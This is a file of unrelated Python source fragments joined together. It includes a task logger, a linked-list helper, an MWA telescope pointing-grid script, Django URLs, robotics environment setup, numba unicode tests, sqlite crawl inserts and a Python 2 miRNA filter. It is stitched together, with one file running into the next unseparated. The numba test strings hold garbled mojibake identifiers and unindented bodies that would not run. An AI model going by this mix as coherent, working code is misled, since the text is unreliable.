                "message": f"{self.bright(task_progress + ' ' + task)} (started at {ts})",
            }
        else:
            return self.unhandled("start_stage", "task", stage, details)

    def task_stage_finish(self, stage, task, task_order, total_tasks, details):
        duration = human(details["duration"])
        if details["result"].is_ok:
            return {
                "level": "info",
                "message": self.good(f"Took ({duration})"),
            }
        else:
            return self.error_result(details["duration"], details["result"].error)

    def task_step_start(self, stage, task, step, step_order, total_steps, details):
        task_progress = f"[{step_order}/{total_steps}]"
        ts = f"[{human(details['ts'])}]" if self.output_ts else ""
        if stage in ("run", "compile"):
            return {
                "level": "info",
                "message": self.info(
                    f"{task_progress} {ts} Executing {self.bright(step)}"
                ),
            }
        else:
            return self.unhandled("start_step", "task", stage, details)

    def task_step_finish(self, stage, task, step, step_order, total_steps, details):
        task_progress = f"[{step_order}/{total_steps}]"
        ts = f"[{human(details['ts'])}]" if self.output_ts else ""
        duration = human(details["duration"])
        if details["result"].is_ok:
            return {
                "level": "info",
                "message": self.good(
                    f"{task_progress}" + f" {ts} {self.bright(step)} ({duration})"
                ),
            }
        else:
            return self.error_result(details["duration"], details["result"].error)
|
from typing import List
class ListNode:
    """A node of a singly linked list."""

    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

    def __eq__(self, other):
        # Equal when the other object is a node and both the value and
        # the (recursively compared) remainder of the list match.
        if not isinstance(other, ListNode):
            return False
        return (self.val, self.next) == (other.val, other.next)

    def __repr__(self):
        return f'Node({self.val})'
def construct_linkedlist(values: List, pos=None):
    """Construct a linked list from *values* and return its head.

    :param values: sequence of node values; empty input returns ``None``.
    :param pos: if there is a cycle in the linked list, pass the index of
        the node that the last node should point to (``None`` = no cycle).
    """
    head = None
    previous = None
    pos_node = None
    # enumerate() replaces the original index-based range(len(...)) loop.
    for i, value in enumerate(values):
        current = ListNode(value)
        if head is None:
            head = current
        if previous is not None:
            previous.next = current
        previous = current
        if i == pos:
            # Remember the node the tail should cycle back to.
            pos_node = current
    # Link the tail: either back to the cycle target or to None.
    if previous is not None:
        previous.next = pos_node
    return head
def construct_multi_list(values: List[List]) -> List[ListNode]:
    """Build one linked list per inner value list."""
    return [construct_linkedlist(value) for value in values]
|
#!/usr/bin/env python3
import argparse
from astropy.coordinates import SkyCoord,EarthLocation,AltAz
from astropy.time import Time
import astropy.units as u
from math import cos
import numpy as np
from matplotlib import use
use('Agg')
import matplotlib.pyplot as plt
from matplotlib import patches
from mwa_pb.mwa_tile import h2e
# vcstools imports
import vcstools.metadb_utils as meta
from vcstools.catalogue_utils import get_psrcat_ra_dec
from vcstools.pointing_utils import sex2deg, format_ra_dec
from vcstools.beam_calc import get_beam_power_over_time
# mwa_search imports
from mwa_search.obs_tools import getTargetAZZA
from mwa_search.grid_tools import get_grid
if __name__ == "__main__":
    # Command-line interface: everything below is driven by these options.
    parser = argparse.ArgumentParser(description="""
    Makes a hexogonal grid pattern around a pointing for a MWA VCS observation.
    grid.py -o 1166459712 -p "06:25:31.20 -36:40:48.0" -d 0.6 -l 1
    """)
    parser.add_argument('-o', '--obsid',type=str,help='Observation ID')
    parser.add_argument('-p', '--pointing',type=str,help='Centre pointing in hh:mm:ss.ss_dd\"mm\'ss.ss')
    parser.add_argument('--aitoff',action="store_true",help='Plots the output in aitoff (may make it hard to analyise).')
    parser.add_argument('-f', '--fraction',type=float,help='Fraction of the full width half maximum to use as the distance between beam centres',default=0.85)
    parser.add_argument('-d', '--deg_fwhm',type=float,help='Sets the FWHM at zenith in degrees (best to test along dec). The script will not calculate the FWHM',default=0.3098)
    parser.add_argument('--dec_range_fwhm',type=float,nargs='+',help='A list of FWHM and ranges in the order of: "FWHM1 decmin1 decmax1 FWHM2 decmin2 decmax2"')
    parser.add_argument('-t', '--type',type=str,help='Can be put in either "hex" or "square" tiling mode. Default is hex.',default='hex')
    parser.add_argument('-l', '--loop',type=int,help='Number of "loops" around the centre pointing the code will calculate. Default is 1',default=1)
    parser.add_argument('--fill',type=float,help='Calculate the number of loops required to fill a circle of the input radius in degrees.')
    parser.add_argument('-a','--all_pointings',action="store_true",help='Will calculate all the pointings within the FWHM of the observations tile beam.')
    parser.add_argument('-b', '--begin',type=int,help='Begin time of the obs for the --all_pointings options')
    parser.add_argument('-e', '--end',type=int,help='End time of the obs for the --all_pointings options')
    parser.add_argument('--dec_range',type=float,nargs='+',help='Dec limits: "decmin decmax". Default -90 90', default=[-90,90])
    parser.add_argument('--ra_range',type=float,nargs='+',help='RA limits: "ramin ramax". Default 0 360', default=[0,360])
    parser.add_argument('-v','--verbose_file',action="store_true",help='Creates a more verbose output file with more information than make_beam.c can handle.')
    parser.add_argument('--pulsar',type=str,nargs='+',help='A list of pulsar to mark on the plot')
    parser.add_argument('--label',type=str,help='A label to put in front of the pointings.')
    parser.add_argument('-n', '--n_pointings', type=int, default=None, help='Number of pointings per output file.')
    parser.add_argument('--out_file_name', type=str, help='The output file name.')
    parser.add_argument('--add_text', action="store_true", help='Adds the pointing in text for each circle on the output plot')
    args=parser.parse_args()

    # Reconstruct the effective command line (useful for logging/reproducing).
    opts_string = ""
    for k in args.__dict__:
        if args.__dict__[k] is not None:
            if k == "pointing":
                # NOTE(review): --pointing is declared type=str, so [0]/[1]
                # index the first two *characters* here -- looks buggy; confirm.
                opts_string = opts_string + ' --' + str(k) + ' "' + str(args.__dict__[k][0]) +\
                    ' ' + str(args.__dict__[k][1]) + '"'
            else:
                opts_string = opts_string + ' --' + str(k) + ' ' + str(args.__dict__[k])

    if args.obsid:
        # Fetch the observation metadata (pointing, duration, delays, freq) once.
        obs, ra, dec, duration, xdelays, centrefreq, channels = \
            meta.get_common_obs_metadata(args.obsid)

    #get fwhm in radians
    centre_fwhm = np.radians(args.deg_fwhm)

    #all_pointing parsing
    # Mutual-exclusion checks: several options compute the loop count or the
    # centre pointing themselves, so combining them would be ambiguous.
    if (args.loop != 1) and args.all_pointings:
        print("Can't use --loop and --all_poinitings as all_pointings calculates the "
              "loops required. Exiting.")
        quit()
    if (args.loop != 1) and args.fill:
        print("Can't use --loop and --fill as --fill calculates the "
              "loops required. Exiting.")
        quit()
    if args.pointing and args.all_pointings:
        print("Can't use --pointing and --all_poinntings as --all_pointings calculates "
              "the pointing. Exiting.")
        quit()
    if args.pointing and args.pulsar:
        print("Can't use --pointing and --pulsar as --pulsar calculates the pointing. Exiting.")
        quit()
    if args.pulsar and args.all_pointings:
        print("Can't use --pulsar and --all_poinntings as --all_pointings calculates "
              "the pointing. Exiting.")
        quit()
    if args.fill:
        # Loops needed for beams spaced deg_fwhm*fraction apart to cover a
        # circle of radius --fill degrees.
        args.loop = int( (args.fill - args.deg_fwhm/2.) / (args.deg_fwhm*args.fraction) )
        print("Using {} loops to fill {} degrees".format(args.loop, args.fill ))

    #calculate pointing
    if args.all_pointings:
        #calculating loop number
        fudge_factor = 2.
        # Tile FWHM ~ fudge * lambda / D (D = 6.56 m), in degrees.
        tile_fwhm = np.degrees(fudge_factor * (3*10**8/(centrefreq*10**6))/6.56 )
        #account for the "increase" in tile beam size due to drifting
        tile_fwhm += duration/3600.*15.
        args.loop = int(tile_fwhm/2./(args.deg_fwhm*args.fraction))
        #calculating pointing from metadata
        if int(obs) < 1252177700 :
            #the ra used to mean the start of the obs so it had to be corrected for
            ra = np.radians(ra + duration/3600.*15./2)
        else:
            ra = np.radians(ra)
        dec = np.radians(dec)
    elif args.pulsar:
        # Centre the grid on the (first) pulsar's catalogue position.
        temp = get_psrcat_ra_dec(pulsar_list=args.pulsar)
        _, raj, decj = format_ra_dec(temp, ra_col = 1, dec_col = 2)[0]
        coord = SkyCoord(raj, decj, unit=(u.hourangle,u.deg))
        ra = coord.ra.radian #in radians
        dec = coord.dec.radian
    elif args.pointing:
        # Pointing given as "hh:mm:ss.ss_dd:mm:ss.ss" (underscore separated).
        coord = SkyCoord(args.pointing.split("_")[0],args.pointing.split("_")[1],
                         unit=(u.hourangle,u.deg))
        ra = coord.ra.radian #in radians
        dec = coord.dec.radian
    else:
        print("Please use either --pointing, --pulsar or --all_pointings. Exiting.")
        quit()

    #calculate grid
    rads, decds = get_grid(ra, dec, centre_fwhm*args.fraction, args.loop, grid_type=args.type)

    #remove pointings outside of ra or dec range
    if args.dec_range != [-90,90] or args.ra_range != [0, 360]:
        print("Removing pointings outside of ra dec ranges")
        radls = []
        decdls = []
        for i in range(len(rads)):
            if (args.dec_range[0] < float(decds[i]) < args.dec_range[1] ) and \
               (args.ra_range[0] < float(rads[i]) < args.ra_range[1]):
                radls.append(rads[i])
                decdls.append(decds[i])
        rads = radls
        decds = decdls

    if args.all_pointings:
        #calculate powers
        obeg, oend = meta.obs_max_min(obs)
        if args.begin:
            start_time = obeg - args.begin
        else:
            start_time = 0
        # NOTE(review): start_time is computed but never used below -- confirm.
        if args.end and args.begin:
            duration = args.end - args.begin
        elif args.end:
            duration = args.end - obeg
        obs_metadata = [obs, ra, dec, duration, xdelays, centrefreq, channels]
        names_ra_dec = []
        for ni in range(len(rads)):
            # Skip grid points pushed past the south celestial pole.
            if float(decds[ni]) < -90.:
                continue
            names_ra_dec.append(["name", rads[ni], decds[ni]])
        names_ra_dec = np.array(names_ra_dec)
        power = get_beam_power_over_time(obs_metadata,
                                         names_ra_dec, degrees=True)
        #check each pointing is within the tile beam
        radls = []
        decdls = []
        tFWHM = np.amax(power)/2. #assumed half power point of the tile beam
        for ni in range(len(names_ra_dec)):
            if max(power[ni]) > tFWHM:
                radls.append(rads[ni])
                decdls.append(decds[ni])
        rads = radls
        decds = decdls

    print("Using skycord to convert ra dec")
    #Use skycoord to get asci
    coord = SkyCoord(rads,decds,unit=(u.deg,u.deg))
    #unformated
    rags_uf = coord.ra.to_string(unit=u.hour, sep=':')
    decgs_uf = coord.dec.to_string(unit=u.degree, sep=':')

    ras = []; decs = []; theta = []; phi = []
    time = Time(float(args.obsid),format='gps')
    print("Formating the outputs")
    #format the ra dec strings
    for i in range(len(rags_uf)):
        rag = rags_uf[i]
        decg = decgs_uf[i]
        temp = format_ra_dec([[rag,decg]])
        rag = temp[0][0]
        decg = temp[0][1]
        if args.verbose_file:
            # Alt/az are only needed for the verbose output format.
            az,za,azd,zad = getTargetAZZA(rag,decg,time)
        else:
            az,za,azd,zad = [0,0,0,0]
        ras.append(rag)
        decs.append(decg)
        theta.append(az)
        phi.append(za)

    # Build the output file name from the options used, unless given explicitly.
    if args.out_file_name:
        out_file_name = args.out_file_name
    else:
        if args.obsid:
            out_file_name = str(args.obsid)
        else:
            out_file_name = ''
        if args.pulsar:
            out_file_name = '{0}_{1}'.format(out_file_name, args.pulsar[0])
        out_file_name += '_grid_positions'
        if args.dec_range != [-90,90] or args.ra_range != [0, 360]:
            out_file_name += '_ra_dec_limited'
        out_file_name = '{0}_f{1}_d{2}_l{3}'.format(out_file_name, args.fraction,
                                                    args.deg_fwhm, args.loop)

    #Writing file
    if args.n_pointings is None:
        # Single output file with every pointing.
        print("Recording the dec limited positons in {0}.txt".format(out_file_name))
        with open('{0}.txt'.format(out_file_name),'w') as out_file:
            if args.verbose_file:
                out_line = "#ra dec az za\n"
                out_file.write(out_line)
            for i in range(len(rads)):
                if args.verbose_file:
                    out_line = str(ras[i])+" "+str(decs[i])+" "+str(theta[i])+" "\
                               +str(phi[i])+" "+str(rads[i])+" "\
                               +str(decds[i])+"\n"
                elif args.label:
                    out_line = "{},{}_{}\n".format(args.label, ras[i], decs[i])
                else:
                    out_line = str(ras[i])+"_"+str(decs[i])+"\n"
                out_file.write(out_line)
    else:
        # Split the pointings into chunks of --n_pointings per file.
        ra_chunks = [ras[x:x+args.n_pointings] for x in range(0, len(ras), args.n_pointings)]
        dec_chunks = [decs[x:x+args.n_pointings] for x in range(0, len(decs), args.n_pointings)]
        for ci in range(len(ra_chunks)):
            first_id = ci * args.n_pointings + 1
            last_id = ci * args.n_pointings + len(ra_chunks[ci])
            print("Recording the dec limited positons in {0}_{1}_{2}.txt".format(out_file_name, first_id, last_id))
            with open('{0}_{1}_{2}.txt'.format(out_file_name, first_id, last_id),'w') as out_file:
                for i in range(len(ra_chunks[ci])):
                    out_file.write("{0}_{1}\n".format(ra_chunks[ci][i], dec_chunks[ci][i]))

    #matplotlib.use('Agg')
    print("Plotting")
    fig = plt.figure(figsize=(7, 7))
    if args.aitoff:
        fig.add_subplot(111)
        print("changing axis")
        ax = plt.axes(projection='mollweide')
        # Mollweide axes expect radians; RA is mirrored so east is left.
        rads = -(np.radians(np.array(rads)))+ np.pi
        decds = np.radians(np.array(decds))
    else:
        plt.axes().set_aspect('equal')
        ax = plt.gca()
        #ax.axis([325., 345., -9., 0.])
        plt.xlabel("ra (degrees)")
        plt.ylabel("dec (degrees)")
    for i in range(len(ras)):
        if args.aitoff:
            fwhm_circle = centre_fwhm/cos(decds[i]) / 2.
            circle = plt.Circle((rads[i],decds[i]),fwhm_circle,
                                color='r', lw=0.1,fill=False)
            ax.add_artist(circle)
        else:
            # presumably the 26.7 offset accounts for beam elongation away
            # from zenith (~MWA latitude) -- TODO confirm.
            fwhm_vert = np.degrees(centre_fwhm/cos(np.radians(decds[i] + 26.7))**2)
            fwhm_horiz = np.degrees(centre_fwhm/cos(np.radians(decds[i])) )
            ellipse = patches.Ellipse((rads[i],decds[i]), fwhm_horiz, fwhm_vert,
                                      linewidth=0.3, fill=False, edgecolor='green')
            ax.add_patch(ellipse)
        if args.add_text:
            ax.text(rads[i], decds[i], str(ras[i] + "_" + decs[i]), fontsize=4, ha='center', va='center')
        #fwhm_circle = centre_fwhm/cos(np.radians(decds[i])) / 2.
        #circle = plt.Circle((rads[i],decds[i]),np.degrees(fwhm_circle),
        #                    color='r', lw=0.1,fill=False)
    plt.scatter(rads,decds,s=0.1,c='black')

    #add some pulsars
    if args.pulsar:
        ra_PCAT = []
        dec_PCAT = []
        pulsar_list = get_psrcat_ra_dec(pulsar_list = args.pulsar)
        for pulsar in pulsar_list:
            ra_temp, dec_temp = sex2deg(pulsar[1], pulsar[2])
            ra_PCAT.append(ra_temp)
            dec_PCAT.append(dec_temp)
        ax.scatter(ra_PCAT, dec_PCAT, s=15, color ='r', zorder=100)
    plt.savefig('{0}.png'.format(out_file_name), bbox_inches='tight', dpi =1000)
    print("Number of pointings: " + str(len(rads)))
    #times out and segfaults after this so I'm going to exit here
    exit()
|
from django.conf import settings
from django.conf.urls import url, patterns
from models import Document
# URL routes for the mmm app; string view names are resolved against the
# 'mmm.views' prefix by patterns().
# NOTE(review): django.conf.urls.patterns and string view references were
# removed in Django 1.10 -- this module only works on older Django releases;
# confirm the project's pinned version before modernizing.
urlpatterns = patterns('mmm.views',
    # /member/<mid>/ -> mmm.views.member_docs
    url(r'^member/(?P<mid>\d+)/$',
        'member_docs',
        name='member-mmms'),
    # /committee/<cid>/ -> mmm.views.committee_docs
    url(r'^committee/(?P<cid>\d+)/$',
        'committee_docs',
        name='committee-mmms'),
)
|
import gym
import envs.fetch as fetch_env
import envs.hand as hand_env
from .utils import goal_distance, goal_distance_obs
# Environment ids supported by make_env(); ids starting with "Fetch" are
# robot-arm tasks, everything else is dispatched to the hand environments.
Robotics_envs_id = [
    'FetchPushDyn-v1',
    'FetchReach-v1',
    'FetchPush-v1',
    'FetchSlide-v1',
    'FetchPickAndPlace-v1',
    'FetchPushNew-v1',
    'FetchCurling-v1',
    'FetchPushObstacle-v1',
    'FetchPickObstacle-v1',
    'FetchPushNoObstacle-v1',
    'FetchPickNoObstacle-v1',
    'FetchPushLabyrinth-v1',
    'FetchPickAndThrow-v1',
    'FetchPickAndSort-v1',
    'HandManipulateBlock-v0',
    'HandManipulateEgg-v0',
    'HandManipulatePen-v0',
    'HandReach-v0'
]
def make_env(args):
    """Create the environment named by ``args.env``.

    The id must appear in Robotics_envs_id; "Fetch*" ids go to the
    fetch-arm factory, all others to the hand factory.
    """
    assert args.env in Robotics_envs_id
    if args.env.startswith('Fetch'):
        return fetch_env.make_env(args)
    # Everything else in Robotics_envs_id is a Hand environment.
    return hand_env.make_env(args)
def clip_return_range(args):
    """Return the (min, max) clipping range for discounted returns of
    ``args.env``.

    With per-step rewards bounded in [-1, 0], the discounted return lies in
    [-1/(1-gamma), 0], so every environment shares the same range.

    Fix: the table previously omitted 'FetchPushNew-v1', 'FetchCurling-v1',
    'FetchPushObstacle-v1' and 'FetchPushNoObstacle-v1' even though they are
    listed in Robotics_envs_id, raising KeyError for those environments.
    """
    gamma_sum = 1.0/(1.0-args.gamma)
    return {
        'FetchPushDyn-v1': (-gamma_sum, 0.0),
        'FetchReach-v1': (-gamma_sum, 0.0),
        'FetchPush-v1': (-gamma_sum, 0.0),
        'FetchSlide-v1': (-gamma_sum, 0.0),
        'FetchPickAndPlace-v1': (-gamma_sum, 0.0),
        'FetchPushNew-v1': (-gamma_sum, 0.0),
        'FetchCurling-v1': (-gamma_sum, 0.0),
        'FetchPushObstacle-v1': (-gamma_sum, 0.0),
        'FetchPickObstacle-v1': (-gamma_sum, 0.0),
        'FetchPushNoObstacle-v1': (-gamma_sum, 0.0),
        'FetchPickNoObstacle-v1': (-gamma_sum, 0.0),
        'FetchPushLabyrinth-v1': (-gamma_sum, 0.0),
        'FetchPickAndThrow-v1': (-gamma_sum, 0.0),
        'FetchPickAndSort-v1': (-gamma_sum, 0.0),
        'HandManipulateBlock-v0': (-gamma_sum, 0.0),
        'HandManipulateEgg-v0': (-gamma_sum, 0.0),
        'HandManipulatePen-v0': (-gamma_sum, 0.0),
        'HandReach-v0': (-gamma_sum, 0.0)
    }[args.env]
|
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
from numba import njit, cfunc, cgutils
from numba.six import exec_
from numba.utils import PY2
from .support import TestCase, unittest
unicode_name1 = u"""
def unicode_name1(เฒ _เฒฐเณ, เฒ เจเฒ ):
return (เฒ _เฒฐเณ) + (เฒ เจเฒ )
"""
unicode_name2 = u"""
def ิพ_ิพ(เฒ _เฒฐเณ, เฒ เจเฒ ):
return (เฒ _เฒฐเณ) + (เฒ เจเฒ )
"""
@unittest.skipIf(PY2, "unicode identifier not supported in python2")
class TestUnicodeNames(TestCase):
    """Check that numba can compile functions whose names and argument
    names are non-ASCII unicode identifiers (PEP 3131)."""

    def make_testcase(self, src, fname):
        """Exec the template ``src`` and return the function named ``fname``."""
        glb = {}
        exec_(src, glb)
        fn = glb[fname]
        return fn

    def test_unicode_name1(self):
        # Unicode argument names, ASCII function name.
        fn = self.make_testcase(unicode_name1, 'unicode_name1')
        cfn = njit(fn)
        self.assertEqual(cfn(1, 2), 3)

    def test_unicode_name2(self):
        # Unicode function name as well.
        fn = self.make_testcase(unicode_name2, 'ิพ_ิพ')
        cfn = njit(fn)
        self.assertEqual(cfn(1, 2), 3)

    def test_cfunc(self):
        # Same function through the cfunc (C callback) compilation path.
        fn = self.make_testcase(unicode_name2, 'ิพ_ิพ')
        cfn = cfunc("int32(int32, int32)")(fn)
        self.assertEqual(cfn.ctypes(1, 2), 3)
class TestUnicodeUtils(TestCase):
    """Tests for cgutils.normalize_ir_text, which must produce latin1-safe
    str output for LLVM IR regardless of unicode in the input."""

    def test_normalize_ir_text(self):
        # non-unicode input
        out = cgutils.normalize_ir_text('abc')
        # str returned
        self.assertIsInstance(out, str)
        # try encoding to latin
        out.encode('latin1')

    @unittest.skipIf(PY2, "unicode identifier not supported in python2")
    def test_normalize_ir_text_py3(self):
        # unicode input
        out = cgutils.normalize_ir_text(unicode_name2)
        # str returned
        self.assertIsInstance(out, str)
        # try encoding to latin
        out.encode('latin1')
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
import TUI.TUIModel
def init(sr):
    """Open the DIS Expose window so the user can see what's going on."""
    tuiModel = TUI.TUIModel.getModel()
    # "None.DIS Expose" is the toplevel-set key of the DIS Expose window.
    tuiModel.tlSet.makeVisible("None.DIS Expose")
def run(sr):
    """Sample script to take a series of DIS calibration images
    and demonstrate looping through data in Python.

    The exposure times and # of iterations are short so the demo runs quickly.
    """
    # Each entry: (exposure type, exposure time in sec, number of exposures).
    calibration_plan = [
        ("flat", 1, 2),
        ("flat", 5, 2),
        ("bias", 0, 2),
        ("dark", 1, 2),
        ("dark", 5, 2),
    ]
    for expType, expTime, numExp in calibration_plan:
        if expType == "bias":
            # bias, so cannot specify time
            cmdStr = "%s n=%d name=dis%s" % (expType, numExp, expType)
        else:
            cmdStr = "%s time=%s n=%d name=dis%s" % (expType, expTime, numExp, expType)
        yield sr.waitCmd(
            actor="disExpose",
            cmdStr=cmdStr,
            abortCmdStr="abort",
        )
|
def insert_crawl_seed(uri, crawlid):
    """Record that ``uri`` was used as a seed for crawl ``crawlid``.

    The seed is first ensured to exist in the Seed table; a duplicate
    (seedURI, crawlId) pair is reported and ignored.
    """
    insert_seed(uri)
    try:
        # Parameterized query: the previous str.format-built SQL was open to
        # SQL injection and broke on URIs containing a single quote.
        cursor.execute(
            "INSERT INTO CrawlSeeds (seedURI, crawlId) VALUES (?, ?)",
            (uri, crawlid))
    except sqlite3.Error as er:
        print(er, end='\n\t...')
        if str(er) == 'UNIQUE constraint failed: CrawlSeeds.seedURI, CrawlSeeds.crawlId':
            print("Already tested the '{}' seed during this crawl.".format(uri))
def insert_seed(uri):
    """Insert ``uri`` into the Seed table; duplicates are reported and ignored.

    Uses a parameterized query: the previous str.format-built SQL was open to
    SQL injection and broke on URIs containing a single quote.
    """
    try:
        cursor.execute("INSERT INTO Seed (seedURI) VALUES (?)", (uri,))
    except sqlite3.Error as er:
        print(er, end='\n\t...')
        if str(er) == 'UNIQUE constraint failed: Seed.seedURI':
            print("'{}' Already in Seeds!".format(uri))
def insert_link(uri, crawlid, source, failed=0):
    """Record a link discovered during crawl ``crawlid`` via seed ``source``.

    :param failed: 1 if the link could not be fetched, 0 otherwise.
    Duplicate (address, originSeedURI, crawlId) rows are reported and ignored.
    """
    try:
        # Parameterized query instead of str.format -- immune to SQL injection
        # and quoting problems in the URI/source strings.
        cursor.execute(
            "INSERT INTO Link (address, crawlId, originSeedURI, failed) "
            "VALUES (?, ?, ?, ?)",
            (uri, crawlid, source, failed))
    except sqlite3.Error as er:
        print(er, end='\n\t...')
        if str(er) == 'UNIQUE constraint failed: Link.address, Link.originSeedURI, Link.crawlId':
            print("'{}' Already visited in this crawl through this seed. Ignoring.".format(uri))
def insert_crawl(crawlid):
    """Register a new crawl id.

    Any database error here is fatal (a duplicate crawl id gets an extra
    explanatory line); the process exits with status 1.
    Uses a parameterized query: the previous str.format-built SQL was open
    to SQL injection.
    """
    try:
        cursor.execute("INSERT INTO Crawl (crawlId) VALUES (?)", (crawlid,))
    except sqlite3.Error as er:
        print(er)
        if str(er) == 'UNIQUE constraint failed: Crawl.crawlId':
            print('\t...crawlId exists.')
        print('Critical Error.')
        print('Exiting!')
        exit(1)
def insert_valid_rdfuri(uri, crawlid, source, response_format):
    """Record an RDF URI validated during a crawl, with the content format
    it was served in; duplicate (rdfSeedURI, originSeedURI, crawlId) pairs
    are reported and ignored.

    Uses a parameterized query: the previous str.format-built SQL was open
    to SQL injection and broke on URIs containing a single quote.
    """
    try:
        cursor.execute(
            "INSERT INTO RdfURI (rdfSeedURI, crawlId, originSeedURI, contentFormat) "
            "VALUES (?, ?, ?, ?)",
            (uri, crawlid, source, response_format))
    except sqlite3.Error as er:
        print(er, end='\n\t...')
        if str(er) == 'UNIQUE constraint failed: RdfURI.rdfSeedURI, RdfURI.originSeedURI, RdfURI.crawlId':
            print("'{}' - '{}' pair is already discovered in this crawl! Ignoring.".format(uri, source))
def insert_failed_seed(uri, crawlid, code):
    """Record a seed that failed with HTTP status ``code`` during a crawl;
    duplicate (seedURI, crawlId) pairs are reported and ignored.

    Uses a parameterized query: the previous str.format-built SQL was open
    to SQL injection and broke on URIs containing a single quote.
    """
    try:
        cursor.execute(
            "INSERT INTO FailedSeed (seedURI, crawlId, statusCode) VALUES (?, ?, ?)",
            (uri, crawlid, code))
    except sqlite3.Error as er:
        print(er, end='\n\t...')
        if str(er) == 'UNIQUE constraint failed: FailedSeed.seedURI, FailedSeed.crawlId':
            print("Already attempted and failed to request '{}' during this crawl. Ignoring.".format(uri))
#!/usr/bin/python
# -*- coding: utf-8 -*-
################################################################################
# Copyright or ยฉ or Copr. Anthony Mathelier and Alessandra Carbone (02-05-2010)
# anthony.mathelier@gmail.com, alessandra.carbone@lip6.fr
#
# This software is a computer program whose purpose is to provide a platform to
# check several questions around miRNAs and pre-miRNAs prediction and play
# between sensitivity and specificity by using parameters variability.
#
# This software is governed by the CeCILL license under French law and
# abiding by the rules of distribution of free software. You can use,
# modify and/or redistribute the software under the terms of the CeCILL
# license as circulated by CEA, CNRS and INRIA at the following URL
# "http://www.cecill.info".
#
# As a counterpart to the access to the source code and rights to copy,
# modify and redistribute granted by the license, users are provided only
# with a limited warranty and the software's author, the holder of the
# economic rights, and the successive licensors have only limited
# liability.
#
# In this respect, the user's attention is drawn to the risks associated
# with loading, using, modifying and/or developing or reproducing the
# software by the user in light of its specific status of free software,
# that may mean that it is complicated to manipulate, and that also
# therefore means that it is reserved for developers and experienced
# professionals having in-depth computer knowledge. Users are therefore
# encouraged to load and test the software's suitability as regards their
# requirements in conditions enabling the security of their systems and/or
# data to be ensured and, more generally, to use and operate it in the
# same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL license and that you accept its terms.
################################################################################
###############################################################################
# Script that filters out precursors overlapping genes defined in the
# GenBank file passed as a parameter.
###############################################################################
import sys, string, re
from Bio import GenBank
def readGbk(cur):
    """Collect the (start, end) spans of gene-like features in a GenBank record.

    Keeps CDS/exon/rRNA/scRNA/snRNA/snoRNA/tRNA/21U-RNA features, plus ncRNAs
    whose ncRNA_class is one of those RNA classes.  Features with sub_features
    (e.g. joined locations) contribute one span per sub-feature.  Coordinates
    are Biopython "nofuzzy" positions.

    Fix: replaces the long `or`/`and` chains using the removed `<>` operator
    with tuple-membership tests (same behaviour, also valid Python 3).
    """
    gene_types = ("CDS", "exon", "ncRNA", "rRNA", "scRNA", "snRNA",
                  "snoRNA", "tRNA", "21U-RNA")
    rna_classes = ("rRNA", "scRNA", "snRNA", "snoRNA", "tRNA", "21U-RNA")
    featList = []
    for feat in cur.features:
        if feat.type not in gene_types:
            continue
        if feat.type == "ncRNA":
            classe = feat.qualifiers['ncRNA_class'][0]
            # Only keep ncRNAs of a known structural RNA class.
            if classe not in rna_classes:
                continue
        if feat.sub_features:
            for subfeat in feat.sub_features:
                featList.append((subfeat.location.nofuzzy_start,
                                 subfeat.location.nofuzzy_end))
        else:
            featList.append((feat.location.nofuzzy_start, feat.location.nofuzzy_end))
    return featList
def find(begin, end, feat):
    """Return 1 if [begin, end] overlaps any (start, end) span in ``feat``,
    else 0.

    ``feat`` is assumed sorted by start position, which lets the scan stop
    at the first span starting past ``end``.
    """
    for span_start, span_end in feat:
        if span_start > end:
            # All remaining (sorted) spans start after the query -- no overlap.
            return 0
        starts_inside = begin <= span_end and begin > span_start
        ends_inside = end <= span_end and end > span_start
        covers = begin <= span_start and end >= span_end
        if starts_inside or ends_inside or covers:
            return 1
    return 0
################################################################################
# Read the precursors and test whether each one overlaps a gene or not
################################################################################
def filter(input, hash, feat):
    """Read predicted precursors from ``input`` and reprint (Python 2 print
    statements, to stdout) only those whose excised region does not overlap
    any gene feature span in ``feat``.

    ``hash`` maps precursor name -> (excise_beg, excise_end, strand), as
    produced by parse_prec().  Closes ``input`` when done.
    NOTE(review): shadows the builtins ``filter``, ``input`` and ``hash``.
    """
    query = ""
    prec = ""
    seq = ""
    struct = ""
    for line in input:
        # Header line: ">query precursor begin:N end:N"
        grp = re.match('>(\S+) (\S+) begin:(\d+) end:(\d+)$', line)
        if grp:
            query = grp.group(1)
            prec = grp.group(2)
            # eval() on regex-matched \d+ acts as int(); int() would be the
            # safer spelling.
            before = eval(grp.group(3))
            after = eval(grp.group(4))
        elif re.search('[AGCTUacgtu]+', line):
            # Sequence line of the current record.
            seq = line
        elif re.search('\(+', line):
            # Dot-bracket structure line: last line of a record, so the
            # record is emitted here if its region is gene-free.
            struct = line
            (begin, end, strand) = hash[prec]
            if not find(begin, end, feat):
                print ">%s %s excise_beg:%d excise_end:%d before:%d after:%d"%(prec,
                    strand, begin, end, before, after)
                print seq,
                print struct,
    input.close()
################################################################################
# Parse the precursor file
################################################################################
def parse_prec(stream):
    """Parse a precursor file into a dict mapping precursor name ->
    (excise_beg, excise_end, strand).

    Header lines look like ">name strand excise_beg:N excise_end:N"; other
    lines are ignored.  Closes ``stream`` when done.

    Fix: uses int() instead of eval() on the matched digit groups -- same
    result for \d+ matches, without evaluating arbitrary expressions.
    """
    hash = {}
    for line in stream:
        grp = re.match(r'>(\S+) (\S+) excise_beg:(\d+) excise_end:(\d+)$', line)
        if grp:
            hash[grp.group(1)] = (int(grp.group(3)), int(grp.group(4)), grp.group(2))
    stream.close()
    return hash
################################################################################
# MAIN
################################################################################
if __name__ == "__main__":
    # Usage: script <predictions> <precursors> <GenBank>
    # (Python 2 only: relies on the removed `<>` operator and iterator .next().)
    if (len (sys.argv) <> 4):
        sys.exit ("\nUsage : " + sys.argv[0]+ " <predictions> <precursors> <GenBank>\n")
    input = open(sys.argv[1], 'r')
    prec = open(sys.argv[2], 'r')
    gbk = open(sys.argv[3], 'r')
    prec_hash = parse_prec(prec)
    feature_parser = GenBank.FeatureParser()
    gb_iterator = GenBank.Iterator(gbk, feature_parser)
    # Only the first record of the GenBank file is used.
    gb_cur = gb_iterator.next()
    feat = readGbk(gb_cur)
    # find() relies on the feature list being sorted by start position.
    feat.sort()
    filter(input, prec_hash, feat)
    gbk.close()
|
# Copyright 2021 Richard Maynard (richard.maynard@gmail.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
